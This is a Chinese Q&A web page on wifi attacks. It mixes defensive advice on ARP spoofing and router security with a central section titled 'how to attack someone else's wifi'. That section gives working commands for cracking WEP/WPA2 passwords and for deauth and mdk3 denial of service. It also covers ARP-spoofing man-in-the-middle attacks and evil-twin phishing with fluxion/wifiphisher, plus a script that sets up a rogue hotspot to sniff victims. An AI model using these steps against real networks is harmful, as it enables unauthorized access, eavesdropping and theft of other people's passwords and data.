无线网络遭到攻击怎么办_wifi网络攻击

hacker|
108

无线网络遭受攻击什么情况?

你的路由器被攻击了,应该是局域网里有设备比如电脑中毒了,先把网络断了把你连上路由器的设备都杀毒下,路由器换个密码,重置下再换也行,也可以连上路由器再把可疑的设备的mac禁了。

ARP攻击就是有设备伪装网关从而对你进行断网攻击或窃取信息,防御没太大效果特别是网速影响大,把攻击者从局域网里清掉是最好的

怎么攻击别人wifi?

1.保密性

我们攻击WIFI的第一个思路就是从保密性出发,我们希望从无线系统中获取用户的明文数据。首先,我们知道WIFI的的认证加密主要有以下四种方式:OPEN(无加密)、WEP(RC4)、WPA(TKIP)、WPA2(CCMP)。

OPEN的WIFI没有采取认证加密措施,任意用户均可链接WIFI,用户数据在BSS(基本服务集)中明文传输,恶意用户没有任何门槛就可连接,然后通过中间人攻击即可获取用户的数据(SSL、SSH等需要其他工具)。如下图所示:

WEP、WPA、WPA2认证加密模式的WIFI需要破解获取密码,然后通过中间人或直接嗅探的方式获取用户明文数据。步骤就不详述了,WEP抓取IVS包,WPA/WPA2抓取handshake包。

WEP大概如下:

airodump-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕获ivs数据包

aireplay-ng -3 -b 目标AP的MAC -h 某一个连接该AP的station的MAC wlan1mon #发送ARP包获取加速获取ivs

aircrack-ng /workspace/sniff/airmon02.ivs

WPA/WPA2大概如下:

airodump-ng -w /workspace/sniff/airmon-wpa2 --bssid 目标AP的MAC -c AP所在chanle wlan1mon #嗅探无线数据,抓取handshake包

aireplay-ng -0 5 -a 目标AP的MAC -c 某一连接AP的station的MAC wlan1mon #发送deauth包,更快的获取handshake

aircrack-ng -w 你的字典文件 /workspace/sniff/airmon-wpa2.cap #破解wpa2密码

密码破解成功后即可连接AP,通过中间人的方式获取用户明文数据,或者直接用wireshark抓取加密包,然后通过airdecap-ng工具解密,然后用wireshark读取已经解密的数据包。

破解WPA、WPA2不一定成功,取决于你字典是否强大,此时我们可以想办法诱骗用户主动输入WIFI密码,比如我们创建一个和目标AP具有同样ESSID的软AP,用户可以连接上,单在浏览网页时会弹出一个虚假的认证页面,告诉用户必须输入WIFI的密码,用户只要输入密码我们即可获取。可以利用fluxion、wifiphisher等工具实现。

wifiphisher将用户输入的密码当做WIFI的密码,但此密码并没有去验证,如果用户输入错误,也会提示出该密码。

而fluxion会将用户输入的密码与handshake校验,成功方认为获取到密码。

2.可用性

通过使目标用户无法使用WIFI来破坏无线系统的可用性,通常通过DOS攻击来实现,比如发送大量的deauth包来迫使用户station与AP解除认证、连接。

aireplay -0 100 -a 目标AP的MAC -c攻击的station的MAC wlan1mon #发送大量的deauth包,迫使目标station无法连接AP

mdk3 wlan1mon a -a 攻击AP的MAC #mdk3可以伪造大量的station与AP连接,从而耗尽AP的资源造成DOS攻击

3.真实性

(1)恶意用户进入无线系统后,可通过中间人攻击获取或修改用户数据。

ARP欺骗或DNS欺骗,ettercap工具非常方便。下面采用mitmf工具通过ARP欺骗将目标浏览网页中的所有图片上下颠倒。

mitmf -i wlan0 --spoof --arp --gateway 192.168.2.1 --target 192.168.2.1 --upsidedownternet

通过driftnet工具抓取目标浏览网页时的图片

driftnet -i wlan0

当然还可以利用中间人攻击做很多事情,比如获取cookie,嵌入js,结合beef进一步攻击等等。。。

(2)伪造AP进行钓鱼攻击

airbase -ng -e airmon wlan1mon #创建钓鱼热点

然后通过下面的脚本开启dhcp服务器(必须先安装isc-dhcp-server),开启路由,开启系统转发,开启防火墙nat等。

1 #!/bin/bash 2 3 echo '配置钓鱼热点...' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpd.leases 7 touch /var/lib/dhcp/dhcpd.leases 8 9 ifconfig at0 up10 ifconfig at0 10.0.0.1 netmask 255.255.255.011 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.112 sysctl net.ipv4.ip_forward=113 14 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at015 echo '等待启动dhcp服务器...'16 sleep 517 service isc-dhcp-server start18 19 iptables -F20 iptables -t nat -F21 22 #iptables -P FORWARD ACCEPT23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

此时用户可以不用密码即可连接airmon热点,并可以上网,但此时可以通过嗅探at0网卡获取用户数据。

4.完整性

篡改用户数据,在WIFI攻击这块貌似用处不大。

5.不可抵赖性

无线网遭受攻击这是什么意思?

你的路由器被攻击了,应该是局域网里有设备比如电脑中毒了,先把网络断了把你连上路由器的设备都杀毒下,路由器换个密码,重置下再换也行,也可以连上路由器再把可疑的设备的mac禁了。

ARP攻击就是有设备伪装网关从而对你进行断网攻击或窃取信息,防御没太大效果特别是网速影响大,把攻击者从局域网里清掉是最好的

在连接别人Wifi时 被断网攻击了怎么办

电脑受到arp断网攻击原因:

1、电脑中了ARP病毒,这种感觉病毒传播速度很快,一般局域网内有一台中毒,其它也很难幸免,所以要找到ARP攻击主机!如果有一天电脑老掉线或极慢,就要考虑电脑是否也感染了病毒,

2、局域网内内有人使用了类似P2P技术的软件,来抢了流量,这个问题就要找用一根网线的用户谈谈了。

建议解决方法:

开启系统自带的防火墙,其实系统自带的防火墙也能应付一般性ARP攻击的!但很少人用。首先点击开始菜单,进入控制面板。

2在控制面板页面选择“系统与安全“”选项进入。

3 在系统与安全界面选择进入windows防火墙下面的检查防火墙状态。

4 在windows防火墙状态页面,点击右侧菜单的”打开或关闭windows防火墙“

5 在开关防火墙页面,将所有网络环境下的防火墙开启。。

家用路由器会遭受攻击吗?

家用路由器说实话,不会设置的话,任凭装宽带的师傅随便设置一通,很容易被入侵!最大的危害就是劫持域名,篡改一堆乱七八糟的东西,容易导致账号密码或者隐私泄露!当然了,真正的黑客肯定是没工夫侵入个人或者家用路由器等设备,一般就是恶意网站上的木马程序或者人为猜测的方式获取路由器管理账号密码进行攻击的!

会遭到攻击,目前国内对家用路由器最大的攻击伤害来自于一个APP,叫做万能钥匙,只要你用万能钥匙,你连接过的所有网络就都会被分享出去。

会的,普通家庭设置安全级别太低,也没有防范意识,很容易被黑客入侵控制,但是基本没有经济风险,但是一般黑客不会干扰你的正常使用,说白了,普通家庭的路由器对于黑客来说没有什么价值,除非很多很多,前几年有一起震惊世界的美国网络攻击事件,就是由数百万路由器,智能家居设备被黑客控制用来攻击目标造成的破坏威力相当恐怖。那些被控制的业主还浑然不知。这个江湖离普通人太远,没必要担心,或者说担心也没用,道高一尺魔高一丈。

简单说下,不考虑别的原因(例如路由器管理员账号密码弱口令,Wifi密码被泄露等等),一般情况下不会被直接攻击,因为大多数路由器都没有公网IP地址(部分拥有公网IP地址的除外),都是通过nat方式透过网关来上网。

打个比方理解下,把数据包比作快件,快递员不知道你的详细地址,只知道你在哪个小区,快递只能先被送到了小区门卫那里,门卫知道你住小区几号楼几单元xxxx房号,就由他再送到家为止。门卫还可以把那些危险的数据包请求挡在小区门外不让他们进来。(只是简单打比方便于理解,现实中小区门卫不负责送快递,请勿深层联想……)

不会的

wiFi遭到ARp攻击,是什么原因?

由于局域网的网络流通不是根据IP地址进行,而是根据MAC地址进行传输。所以,MAC地址在A上被伪造成一个不存在的MAC地址,这样就会导致网络不通,A不能Ping通C!这就是一个简单的ARP欺骗。

情况一、当局域网内某台主机感染了ARP病毒时,会向本局域网内(指某一网段,比如:10.10.75.0这一段)所有主机发送ARP欺骗攻击谎称自己是这个网端的网关设备,让原本流向网关的流量改道流向病毒主机,造成受害者不能正常上网。

情况二、局域网内有某些用户使用了ARP欺骗程序(如:网络执法官,QQ盗号软件等)发送ARP欺骗数据包,致使被攻击的电脑出现突然不能上网,过一段时间又能上网,反复掉线的现象。

0条大神的评论

发表评论